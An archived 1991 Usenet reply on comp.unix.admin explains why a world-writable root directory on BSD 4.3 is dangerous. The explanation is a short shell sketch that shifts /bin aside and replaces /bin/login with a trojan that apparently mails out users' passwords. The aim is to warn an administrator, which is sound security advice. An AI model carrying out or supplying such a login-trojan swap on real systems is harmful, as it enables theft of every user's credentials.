Possible security problem, need information...

Marcus J. Ranum mjr at hussar.dco.dec.com
Wed Mar 20 01:11:45 AEST 1991


In article <1991Mar18.200957.166 at gacvx2.gac.edu> dan at gacvx2.gac.edu writes:
>Greetings,
> 
>Is there anything inherently evil giving world write access to the "root" (aka
>"/") directory on a BSD 4.3 UNIX system?  The exact permission with the command
>"ls -ld /" is "drwxrwxrwt".

	mv /bin /...
	mkdir /bin
	ln /.../* /bin
	mv ~/myloginthatmailsmeallloginpasswords /bin/login

	unsubtle, but you get the idea.

	it's not "inherently evil" it's inherently brain-dead.

mjr.
-- 
             The world is just backing store for virtual reality.



More information about the Comp.unix.admin mailing list